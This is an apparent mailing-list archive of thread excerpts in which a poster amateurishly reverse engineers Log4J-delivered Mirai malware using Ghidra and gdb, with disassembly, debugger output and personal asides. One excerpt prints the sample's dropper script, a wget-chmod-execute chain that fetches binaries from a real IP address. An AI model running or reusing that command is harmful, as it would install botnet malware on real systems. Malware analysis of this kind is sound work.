Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure to share these relations On Tue, Dec 14, 2021, 9:16 AM Karl wrote: > On 12/14/21, wrote: > > > >> What brought you to message me? have you received other posts i've > made? > > > > I am getting your messages through the cypherpunk email list. I think > > they are pretty

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure to share these relations On Tue, Dec 14, 2021, 9:12 AM wrote: > > > What brought you to message me? have you received other posts i've made? > > I am getting your messages through the cypherpunk email list. I think > they are pretty entertaining to read so I thought I would message

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 8:59 AM Karl wrote: > > Sorry to hear that. I'm sure you're gonna make it nonetheless! > > What brought you to message me? have you received other posts i've made? > > >> Long ago, security was all about reverse engineering. > > > >

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 8:45 AM wrote: > On 12/14/2021 2:19 PM, Karl wrote: > > I've been homeless and crazy for years, spasms and visions rather than > > doing things I desire to do. When I saw this malware and started > > posting looking at it from my mobile

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 8:19 AM Karl wrote: > On 12/14/21, wrote: > > Thanks for the information! > > I'm sure there are communities and tools for reverse engineering > > programs (i.e. malware). > > Why do you need a task to work on? Reverse engineering

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 8:14 AM wrote: > Thanks for the information! > I'm sure there are communities and tools for reverse engineering > programs (i.e. malware). > Why do you need a task to work on? Reverse engineering malware sounds > like a good task to me. >

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 8:09 AM Karl wrote: > I'm looking at these binaries! > > https://bafybeibfppl57sszyk733lswextgmkbu2aaysboldqtibu5capjxgwrw7y.ipfs.dweb.link/ > and elsewhere. I don't really know what they do. > > I've reversed a little code before but

Re: [spam][crazy] bomb malware

2021-12-15 Thread Karl
making sure I share these relations On Tue, Dec 14, 2021, 7:59 AM wrote: > Hi K, > > do I understand it correctly that you are trying to reverse engineer > some malware? Did you have experience with it before starting to work on > this particular malware? > I find the topic quite interesting...

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
it was pleasant to add those bits we'll see whether and how this continues i have appointments and things today now

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
> 08048169 83 e4 f0    AND ESP,0xfff0 > > $ecx is $esp before being aligned to 16 bytes. 0xfff0 would be 8 bytes i suppose, not 16

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
param_2 is edx which is 0 that's the first three pushed values then the function pointers, two of them ecx here is 0xc944. I type `p *$ecx` into gdb and see it's a valid dereferencable pointer. wonder where this came from. glancing up at the entrypoint assembly 08048167 89 e1

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i type 'run' into gdb to restart from the entrypoint param_1 is eax which is 0 esp=>local_8 is just plain esp.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
Here's where the entrypoint hands off control. It pushes function addresses and registers. It's rare for function addresses to be passed to other functions in mainstream code. In gdb, we can see what values all these parameters and registers have. 0804816c 50 PUSH

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
The first thing I notice here is that the function takes a _lot_ of parameters. This is more poignant because it makes the assembly complex, but back in the entrypoint we saw what values were passed for each one of these parameters. **

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
so let's go back to ghidra, which probably has a debugger of its own even somewhere, and guess what this function will be doing before we step further through it.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
here it is after 'si'. something to remember when doing this is that it is a very old practice for binaries like this to detect whether or not they are being run in a conventional debugger. so this approach can only get you so far (and is very risky). ┌─Register group:

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
here i've repeatedly typed 'ni' to move it to the function call that initiates the mysterious behavior of the malware. you don't have to type 'ni' over and over again, gdb will assume you meant to type the same thing again if you just hit 'enter'. here, we don't want to type 'ni'. we'll type

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
here it is skinny enough to see i don't usually use these views but they're fastest to find people reminding you of the commands to enable online ('layout asm', 'layout regs') up at the top are the registers of the process. the 'working memory'. they're lowercase now, instead of uppercase. then

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
this is what a gdb reg/asm layout looks like when copy-pasted into an email ┌─Register group: general┐ │eax 0x0 0 │ │ecx 0x0 0 │

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
I found this command from the web: (gdb) info file Symbols from "/media/3/pkg/ghidra-projects/Log4J Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00". Local exec file: `/media/3/pkg/ghidra-projects/Log4J

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
people always say you should push your edge, challenge your fears! i'll be running it with a debugger so that it doesn't go too far. if you aren't a crazed homeless software developer, you'll want to have a vm or a dedicated offline system for something like this. $ gdb

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i'm destabilising here. sounds like you want a quick summary of these binaries. a researcher for an antivirus group would likely have that. i'm not one, so i'm a lot slower. i really enjoy this work, it's very rare for me to be able to do something like this.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i'm just gonna run the binary. i bet that idea is part of some of my fears.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
on with FUN_0804d23f !

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
we could skip all the details and try to profile more attributes of the binaries.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
The function called from the entrypoint is FUN_0804d23f . It's bigger.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i'm seeing that pattern, with the skipped code calling a void pointer, elsewhere in the code. for something confusing like that, it's clearest to watch the system execute to see what is important. so it would make sense to move to code that i can run. this function is passed as a pointer in the

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
// dereference the pointer and move the discovered value into EDX. // ghidra here is reminding us that PTR_DAT_0804e024 in EAX points to DAT_0804e00c // and if one of those values is renamed in the interface, it will update the name everywhere 080480e0 8b 10    MOV EDX,dword

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
There are a handful of different ways to notate assembly code. Luckily, I stumbled on what appears to be the same one. https://www.cs.virginia.edu/~evans/cs216/guides/x86.html#memory Some examples of mov instructions using address computations are: mov eax, [ebx] ; Move the 4 bytes in memory at

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
// call EDX as a function. EDX is the 4th 32-bit register, i.e. cpu working-memory. 080480d9 ff d2 CALL EDX // this is where the jump statement from 080480cd ends up. So, this is the start of the while loop, and the code immediately above isn't executed until this is.

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
// this next line is 080480d1 . this line is jumped to (referenced XREF (j)) from 080480e4 LAB_080480d1 XREF[1]: 080480e4(j) // add 4 to the first active value (EAX is the first 32-bit register, the working memory of a cpu) 080480d1 83 c0 04

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
so let's go through that chunk by chunk // function prolog, set up a C-style function 080480c0 55    PUSH EBP 080480c1 89 e5    MOV EBP,ESP 080480c3 83 ec 08    SUB ESP,0x8 // compare the flag with 0 (false) 080480c6 80 3d

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
I'm looking at this autogenerated ghidra decompilation. I labeled the flag as a bool. PTR_DAT_0804e024 contains the address of DAT_0804e00c which contains void at start. The logic here is a little confusing. I'm trying to put comments inline below. void FUN_080480c0(void) { code *pcVar1;

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i wrote a lot more and my system froze quite thoroughly and i rebooted it

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
> while over them and end up hitting 'F' to reanalyse them as functions. in ida pro one hits 'P' to do this

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
I didn't end up including comments. the LAB_* references pushed onto the stack (to be passed to FUN_0804d23f) are function pointers. I click on them or hit enter while over them and end up hitting 'F' to reanalyse them as functions. I can tell they are functions because the instructions at their

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
fork situation resolved i've loaded the mirai binary into the ghidra analyser. Here's how ghidra displays the mirai entrypoint. Comments from me are preceded by "//" inline. ** * *

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
i found where i had ghidra downloaded, and booted it up again. i'd like to find the entrypoint to the mirai binary i have a fork in a food container that has shattered. i'll leave this system to replace it. i don't want to accidentally eat a fork fragment in food in the container in a few days

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh ASCII shell script, with CRLF line terminators, indicating

Re: [spam][crazy] bomb malware

2021-12-14 Thread Karl
this was incredibly helpful for me. working with this malware. i am just going to go back to it and poke around.

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
most of the log here is missing. my computer and me both had some issues.

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
kay my system somehow already has torch installed guess i built it and forgot! oooh it has errors when launched __time for a virtualenv using an old version of python__ python releases are at https://www.python.org/downloads/ i have 3.10 . there's no torch binary. installing 3.9 hum

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
lots of writing lost terminal crashed nice opportunity here to look into finetuning T5 to do automated decompilation

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
more crazy stuff! also this situation sucks and is ridiculous, obviously

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
nonetheless! human workers are crucial and if we let ourselves know that there is no purpose to doing more work than we feel like in the first place because it just produces more, we might get confused! anyway i am working on moving forward on a maintenance step for an airgapped system i'm

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
oh! to defuse the bomb? yeah you could totally mutate a virus to plug the hole. i'm not the best person to do that, but i guess i could pursue it a little. the drone hive would like a word, though: - it is much more efficient to train a language model to do this, than to find random hackers on

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
executive summary: it takes a few days for somebody to analyse an unknown binary, and it is much easier if they are set up to do so and have significant experience. we also have the technology nowadays to do it automatically using what's called AI but is more just a bunch of matrices. i'm kind

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
0631 i'm on my truck laptop! i'm kinda freaking out a bit, but being able to stand up was great. i'm not set up for reverse engineering, and i only have two systems with large displays for extensive work like that if done manually. this is one of them. the other is [airgapped] but not set up

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
$ tr -dc 0123456789abcdef

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
my phone is aarch64 so this is a small stumbling block websearching found this article on reverse engineering go binaries using ghidra: https://cujo.com/reverse-engineering-go-binaries-with-ghidra/ dunno if it's any good, but it's fun to try to install ghidra on my phone! maybe check for strings

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
~/.../l4j2/Log4J Malware $ file Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped ~/.../l4j2/Log4J Malware $ file

Re: [spam][crazy] bomb malware

2021-12-13 Thread Karl
$ less Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh 18% 0519 wget http://62.210.130.250/web/admin/x86;chmod +x x86;./x86 x86; wget http://62.210.130.250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g; wget http://62.210.130.250/web/admin/x86_64;chmod +x x86_64;./x86_g

[spam][crazy] bomb malware

2021-12-13 Thread Karl
I found some log4j malware! Somebody sent it to an old disrupted hacker list. Log4J Malware/ Log4J Malware/Mirai/ Log4J Malware/Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh Log4J Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 Log4J